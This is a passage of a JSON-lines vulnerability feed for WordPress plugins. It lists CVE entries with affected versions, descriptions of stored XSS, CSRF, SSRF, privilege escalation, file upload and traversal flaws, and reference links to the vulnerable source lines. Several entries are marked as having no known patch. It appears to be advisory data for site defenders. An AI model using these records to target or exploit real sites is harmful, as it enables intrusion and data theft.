plugin.","refs":"[{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/wicked-folders\\\/tags\\\/2.18.16\\\/lib\\\/class-wicked-folders-ajax.php\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/wicked-folders\\\/tags\\\/2.18.16\\\/lib\\\/class-wicked-folders-ajax.php\",\"refsource\":\"MISC\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/29358ea9-21b7-4294-8fc9-0d38e689cf53\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/29358ea9-21b7-4294-8fc9-0d38e689cf53\",\"refsource\":\"MISC\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&new=2860994%40wicked-folders%2Ftrunk&old=2805161%40wicked-folders%2Ftrunk&sfp_email=&sfph_mail=\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&new=2860994%40wicked-folders%2Ftrunk&old=2805161%40wicked-folders%2Ftrunk&sfp_email=&sfph_mail=\",\"refsource\":\"MISC\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2023-0491","slug":"schedulicity-online-appointment-booking","versionImpact":"2.21","description":"The Schedulicity WordPress plugin through 2.21 does not validate and escape some of its shortcode attributes before outputting them back in a page\/post where the shortcode is embedded, which could allow users with the contributor role and above to perform Stored Cross-Site Scripting attacks.","refs":"[{\"url\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/b1a7e8fc-ffcf-493b-9f2d-ffa5d2348b60\",\"name\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/b1a7e8fc-ffcf-493b-9f2d-ffa5d2348b60\",\"refsource\":\"MISC\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2023-0766","slug":"newsletter-popup","versionImpact":"1.2","description":"The Newsletter Popup WordPress plugin through 1.2 does not have CSRF checks in some places, which could allow attackers to make logged in users perform unwanted actions via CSRF attacks as the wp_newsletter_show_localrecord page is not protected with a nonce.","refs":"[{\"url\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/90a1976c-0348-41ea-90b4-f7a5d9306c88\",\"name\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/90a1976c-0348-41ea-90b4-f7a5d9306c88\",\"refsource\":\"MISC\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2023-2563","slug":"contact-forms","versionImpact":"1.5.7","description":"The WordPress Contact Forms by Cimatti plugin for WordPress is vulnerable to Cross-Site Request Forgery in versions up to, and including, 1.5.7. This is due to missing or incorrect nonce validation on the function _accua_forms_form_edit_action. This makes it possible for unauthenticated attackers to delete forms created with this plugin via a forged request granted they can trick a site administrator into performing an action such as clicking on a link.","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/f80a1f13-c1b9-4259-8d96-71a3cbcaf4ca?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/f80a1f13-c1b9-4259-8d96-71a3cbcaf4ca?source=cve\",\"refsource\":\"MISC\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/contact-forms\\\/trunk\\\/accua-forms.php#L738\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/contact-forms\\\/trunk\\\/accua-forms.php#L738\",\"refsource\":\"MISC\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&old=2924628%40contact-forms&new=2924628%40contact-forms&sfp_email=&sfph_mail=\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&old=2924628%40contact-forms&new=2924628%40contact-forms&sfp_email=&sfph_mail=\",\"refsource\":\"MISC\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2023-3779","slug":"essential-addons-for-elementor-lite","versionImpact":"5.8.1","description":"The Essential Addons For Elementor plugin for WordPress is vulnerable to unauthenticated API key disclosure in versions up to, and including, 5.8.1 due to the plugin adding the API key to the source code of any page running the MailChimp block. This makes it possible for unauthenticated attackers to obtain a site's MailChimp API key. We recommend resetting any MailChimp API keys if running a vulnerable version of this plugin with the MailChimp block enabled as the API key may have been compromised. This only affects sites running the premium version of the plugin and that have the Mailchimp block enabled on a page.","refs":"[{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&old=2938177%40essential-addons-for-elementor-lite&new=2938177%40essential-addons-for-elementor-lite&sfp_email=&sfph_mail=\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&old=2938177%40essential-addons-for-elementor-lite&new=2938177%40essential-addons-for-elementor-lite&sfp_email=&sfph_mail=\",\"refsource\":\"MISC\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/e007c713-74bc-4ff5-a198-70dcc8a8ee68?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/e007c713-74bc-4ff5-a198-70dcc8a8ee68?source=cve\",\"refsource\":\"MISC\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2023-6880","slug":"visualcomposer","versionImpact":"45.6.0","description":"The Visual Composer Website Builder, Landing Page Builder, Custom Theme Builder, Maintenance Mode & Coming Soon Pages plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the plugin's custom fields in all versions up to, and including, 45.6.0 due to insufficient input sanitization and output escaping on user supplied attributes. This makes it possible for authenticated attackers with contributor-level and above permissions to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/622b9b46-774d-4251-9a79-73e5b398de57?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/622b9b46-774d-4251-9a79-73e5b398de57?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/help.visualcomposer.com\\\/release-notes\\\/\",\"name\":\"https:\\\/\\\/help.visualcomposer.com\\\/release-notes\\\/\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-1688","slug":"woo-total-sales","versionImpact":"3.1.4","description":"The Woo Total Sales plugin for WordPress is vulnerable to unauthorized access of data due to a missing capability check on the get_orders_archive() function in all versions up to, and including, 3.1.4. This makes it possible for unauthenticated attackers to retrieve sales reports for the store.","recommendation":"No known patch available. Please review the vulnerability's details in depth and employ mitigations based on your organization's risk tolerance. It may be best to uninstall the affected software and find a replacement.","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/630d5dcc-ee51-4c2d-b4fb-191637311d6b?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/630d5dcc-ee51-4c2d-b4fb-191637311d6b?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/woo-total-sales\\\/trunk\\\/includes\\\/awts-backend-general-overview.php#L256\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/woo-total-sales\\\/trunk\\\/includes\\\/awts-backend-general-overview.php#L256\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-7247","slug":"bdthemes-element-pack-lite","versionImpact":"5.7.2","description":"The Element Pack Elementor Addons (Header Footer, Template Library, Dynamic Grid & Carousel, Remote Arrows) plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the plugin's Custom Gallery and Countdown widgets in all versions up to, and including, 5.7.2 due to insufficient input sanitization and output escaping on user supplied attributes. This makes it possible for authenticated attackers, with contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/86068c50-2f24-4af9-a20f-704d52e98ce2?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/86068c50-2f24-4af9-a20f-704d52e98ce2?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/bdthemes-element-pack-lite\\\/trunk\\\/assets\\\/js\\\/bdt-uikit.js#L4223\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/bdthemes-element-pack-lite\\\/trunk\\\/assets\\\/js\\\/bdt-uikit.js#L4223\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/bdthemes-element-pack-lite\\\/trunk\\\/assets\\\/js\\\/ep-scripts.js#L514\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/bdthemes-element-pack-lite\\\/trunk\\\/assets\\\/js\\\/ep-scripts.js#L514\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/bdthemes-element-pack-lite\\\/trunk\\\/assets\\\/js\\\/ep-scripts.js#L576\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/bdthemes-element-pack-lite\\\/trunk\\\/assets\\\/js\\\/ep-scripts.js#L576\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/bdthemes-element-pack-lite\\\/#developers\",\"name\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/bdthemes-element-pack-lite\\\/#developers\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&old=3130355%40bdthemes-element-pack-lite&new=3130355%40bdthemes-element-pack-lite&sfp_email=&sfph_mail=\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&old=3130355%40bdthemes-element-pack-lite&new=3130355%40bdthemes-element-pack-lite&sfp_email=&sfph_mail=\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3133714\\\/\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3133714\\\/\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3133714\\\/#file1110\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3133714\\\/#file1110\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-9368","slug":"aggregator-advanced-settings","versionImpact":"1.2.1","description":"The Aggregator Advanced Settings plugin for WordPress is vulnerable to Stored Cross-Site Scripting via SVG File uploads in all versions up to, and including, 1.2.1 due to insufficient input sanitization and output escaping. This makes it possible for authenticated attackers, with Author-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses the SVG file.","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/838bfa4c-2eb7-4f76-a6c3-ab4684f3913c?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/838bfa4c-2eb7-4f76-a6c3-ab4684f3913c?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/aggregator-advanced-settings\\\/#developers\",\"name\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/aggregator-advanced-settings\\\/#developers\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-10180","slug":"cf7-repeatable-fields","versionImpact":"2.0.1","description":"The Contact Form 7 \u2013 Repeatable Fields plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the plugin's field_group shortcode in all versions up to, and including, 2.0.1 due to insufficient input sanitization and output escaping on user supplied attributes. This makes it possible for authenticated attackers, with contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/0782bc16-7d21-4205-af01-97e3ad3db40b?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/0782bc16-7d21-4205-af01-97e3ad3db40b?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/cf7-repeatable-fields\\\/#developers\",\"name\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/cf7-repeatable-fields\\\/#developers\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3173935\\\/\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3173935\\\/\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-10323","slug":"jetwidgets-for-elementor","versionImpact":"1.0.18","description":"The JetWidgets For Elementor plugin for WordPress is vulnerable to Stored Cross-Site Scripting via REST API SVG File uploads in all versions up to, and including, 1.0.18 due to insufficient input sanitization and output escaping. This makes it possible for authenticated attackers, with Author-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses the SVG file.","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/e4b4e4ba-ab66-496a-b77f-8dd77cd16ea8?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/e4b4e4ba-ab66-496a-b77f-8dd77cd16ea8?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/jetwidgets-for-elementor\\\/#developers\",\"name\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/jetwidgets-for-elementor\\\/#developers\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3184475\\\/\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3184475\\\/\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-12470","slug":"sakolawp-lite","versionImpact":"1.0.8","description":"The School Management System \u2013 SakolaWP plugin for WordPress is vulnerable to privilege escalation in all versions up to, and including, 1.0.8. This is due to the registration function not properly limiting what roles a user can register as. This makes it possible for unauthenticated attackers to register as an administrative user.","refs":"[{\"url\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/sakolawp-lite\\\/\",\"name\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/sakolawp-lite\\\/\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/db1c581b-5cc9-46c0-ba5d-605642697729?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/db1c581b-5cc9-46c0-ba5d-605642697729?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2025-23842","slug":"wordpress-gallery-plugin","versionImpact":"1.4","description":"Cross-Site Request Forgery (CSRF) vulnerability in Nilesh Shiragave WordPress Gallery Plugin allows Cross Site Request Forgery. This issue affects WordPress Gallery Plugin: from n\/a through 1.4.","recommendation":"No known patch available. Please review the vulnerability's details in depth and employ mitigations based on your organization's risk tolerance. It may be best to uninstall the affected software and find a replacement.","refs":"[{\"url\":\"https:\\\/\\\/patchstack.com\\\/database\\\/wordpress\\\/plugin\\\/wordpress-gallery-plugin\\\/vulnerability\\\/wordpress-wordpress-gallery-plugin-plugin-1-4-csrf-to-stored-xss-vulnerability?_s_id=cve\",\"name\":\"https:\\\/\\\/patchstack.com\\\/database\\\/wordpress\\\/plugin\\\/wordpress-gallery-plugin\\\/vulnerability\\\/wordpress-wordpress-gallery-plugin-plugin-1-4-csrf-to-stored-xss-vulnerability?_s_id=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2025-5817","slug":"import-products-to-wc","versionImpact":"1.2.7","description":"The Amazon Products to WooCommerce plugin for WordPress is vulnerable to Server-Side Request Forgery in all versions up to, and including, 1.2.7 via the wcta2w_get_urls(). This makes it possible for unauthenticated attackers to make web requests to arbitrary locations originating from the web application and can be used to query and modify information from internal services.","recommendation":"No known patch available. Please review the vulnerability's details in depth and employ mitigations based on your organization's risk tolerance. It may be best to uninstall the affected software and find a replacement.","refs":"[{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/import-products-to-wc\\\/trunk\\\/inc\\\/urls-ajax.php#L28\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/import-products-to-wc\\\/trunk\\\/inc\\\/urls-ajax.php#L28\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/5055cf24-14c7-4533-8900-a5f4c1435201?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/5055cf24-14c7-4533-8900-a5f4c1435201?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2025-6681","slug":"fan-page","versionImpact":"1.0.1","description":"The Fan Page plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the \u2018width\u2019 parameter in all versions up to, and including, 1.0.1 due to insufficient input sanitization and output escaping. This makes it possible for authenticated attackers, with Contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.","refs":"[{\"url\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/fan-page\\\/#developers\",\"name\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/fan-page\\\/#developers\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/7f86a85c-fe40-4020-b4d2-623dabac98a2?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/7f86a85c-fe40-4020-b4d2-623dabac98a2?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2023-0733","slug":"newsletter-popup","versionImpact":"1.2","description":"The Newsletter Popup WordPress plugin through 1.2 does not sanitise and escape some of its settings, which could allow unauthenticated users to perform Stored Cross-Site Scripting attacks","refs":"[{\"url\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/fed1e184-ff56-44fe-9876-d17c0156447a\",\"name\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/fed1e184-ff56-44fe-9876-d17c0156447a\",\"refsource\":\"MISC\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2023-3813","slug":"jupiterx-core","versionImpact":"2.5.0","description":"The Jupiter X Core plugin for WordPress is vulnerable to arbitrary file downloads in versions up to, and including, 2.5.0. This makes it possible for unauthenticated attackers to download the contents of arbitrary files on the server, which can contain sensitive information. This requires the premium version of the plugin to be activated.","refs":"[{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/jupiterx-core\\\/trunk\\\/includes\\\/extensions\\\/raven\\\/includes\\\/utils.php?rev=2777235#L425\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/jupiterx-core\\\/trunk\\\/includes\\\/extensions\\\/raven\\\/includes\\\/utils.php?rev=2777235#L425\",\"refsource\":\"MISC\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/f767d94b-fe92-4b69-9d81-96de51e12983?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/f767d94b-fe92-4b69-9d81-96de51e12983?source=cve\",\"refsource\":\"MISC\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2023-6825","slug":"wp-file-manager","versionImpact":"7.2.1","description":"The File Manager and File Manager Pro plugins for WordPress are vulnerable to Directory Traversal in versions up to, and including version 7.2.1 (free version) and 8.3.4 (Pro version) via the target parameter in the mk_file_folder_manager_action_callback_shortcode function. This makes it possible for attackers to read the contents of arbitrary files on the server, which can contain sensitive information and to upload files into directories other than the intended directory for file uploads. The free version requires Administrator access for this vulnerability to be exploitable. The Pro version allows a file manager to be embedded via a shortcode and also allows admins to grant file handling privileges to other user levels, which could lead to this vulnerability being exploited by lower-level users.","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/93f377a1-2c33-4dd7-8fd6-190d9148e804?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/93f377a1-2c33-4dd7-8fd6-190d9148e804?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/github.com\\\/Studio-42\\\/elFinder\\\/blob\\\/master\\\/php\\\/elFinderVolumeDriver.class.php#L6784\",\"name\":\"https:\\\/\\\/github.com\\\/Studio-42\\\/elFinder\\\/blob\\\/master\\\/php\\\/elFinderVolumeDriver.class.php#L6784\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&new=3023403%40wp-file-manager%2Ftrunk&old=2984933%40wp-file-manager%2Ftrunk&sfp_email=&sfph_mail=\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&new=3023403%40wp-file-manager%2Ftrunk&old=2984933%40wp-file-manager%2Ftrunk&sfp_email=&sfph_mail=\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-1679","slug":"a4-barcode-generator","versionImpact":"3.4.6","description":"The Print Labels with Barcodes. Create price tags, product labels, order labels for WooCommerce plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the template and javascript label fields in all versions up to, and including, 3.4.6 due to insufficient input sanitization and output escaping. This makes it possible for authenticated attackers, with subscriber access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.","recommendation":"No known patch available. Please review the vulnerability's details in depth and employ mitigations based on your organization's risk tolerance. It may be best to uninstall the affected software and find a replacement.","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/c2d03b83-c406-4d3f-b6be-015edcc15515?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/c2d03b83-c406-4d3f-b6be-015edcc15515?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/a4-barcode-generator\\\/trunk\\\/class\\\/BarcodeTemplates\\\/BarcodeTemplatesController.php?rev=2870656\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/a4-barcode-generator\\\/trunk\\\/class\\\/BarcodeTemplates\\\/BarcodeTemplatesController.php?rev=2870656\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-4431","slug":"lastudio-element-kit","versionImpact":"1.3.7.6","description":"The LA-Studio Element Kit for Elementor plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the \u2018id\u2019 parameter in all versions up to, and including, 1.3.7.6 due to insufficient input sanitization and output escaping. This makes it possible for authenticated attackers, with contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/6c87204d-6697-4d06-aad2-279fa95f503a?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/6c87204d-6697-4d06-aad2-279fa95f503a?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/lastudio-element-kit\\\/trunk\\\/templates\\\/team-member\\\/global\\\/custom.php#L157\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/lastudio-element-kit\\\/trunk\\\/templates\\\/team-member\\\/global\\\/custom.php#L157\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/lastudio-element-kit\\\/trunk\\\/templates\\\/posts\\\/global\\\/index.php#L116\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/lastudio-element-kit\\\/trunk\\\/templates\\\/posts\\\/global\\\/index.php#L116\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/lastudio-element-kit\\\/trunk\\\/templates\\\/banner-list\\\/global\\\/index.php#L75\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/lastudio-element-kit\\\/trunk\\\/templates\\\/banner-list\\\/global\\\/index.php#L75\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/lastudio-element-kit\\\/trunk\\\/templates\\\/testimonials\\\/global\\\/index.php#L71\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/lastudio-element-kit\\\/trunk\\\/templates\\\/testimonials\\\/global\\\/index.php#L71\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/lastudio-element-kit\\\/trunk\\\/templates\\\/images-layout\\\/global\\\/index.php#L75\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/lastudio-element-kit\\\/trunk\\\/templates\\\/images-layout\\\/global\\\/index.php#L75\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/lastudio-element-kit\\\/trunk\\\/templates\\\/instagram-feed\\\/global\\\/index.php#L75\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/lastudio-element-kit\\\/trunk\\\/templates\\\/instagram-feed\\\/global\\\/index.php#L75\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/lastudio-element-kit\\\/trunk\\\/templates\\\/advanced-carousel\\\/global\\\/simple\\\/items-loop-end.php#L7\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/lastudio-element-kit\\\/trunk\\\/templates\\\/advanced-carousel\\\/global\\\/simple\\\/items-loop-end.php#L7\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3090513\\\/\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3090513\\\/\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/lastudio-element-kit\\\/#developers\",\"name\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/lastudio-element-kit\\\/#developers\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-6823","slug":"media-library-assistant","versionImpact":"3.18","description":"The Media Library Assistant plugin for WordPress is vulnerable to arbitrary file uploads due to missing file type validation involving the mla-inline-edit-upload-scripts AJAX action in all versions up to, and including, 3.18. This makes it possible for authenticated attackers, with Author-level access and above, to upload arbitrary files on the affected site's server which may make remote code execution possible.","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/9a446fe7-c97a-436e-b494-b924e6518297?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/9a446fe7-c97a-436e-b494-b924e6518297?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/media-library-assistant\\\/trunk\\\/includes\\\/class-mla-settings.php#L32\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/media-library-assistant\\\/trunk\\\/includes\\\/class-mla-settings.php#L32\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/media-library-assistant\\\/#developers\",\"name\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/media-library-assistant\\\/#developers\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3133909\\\/\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3133909\\\/\",\"refsource\":\"\",\"tags\":[]}]"}
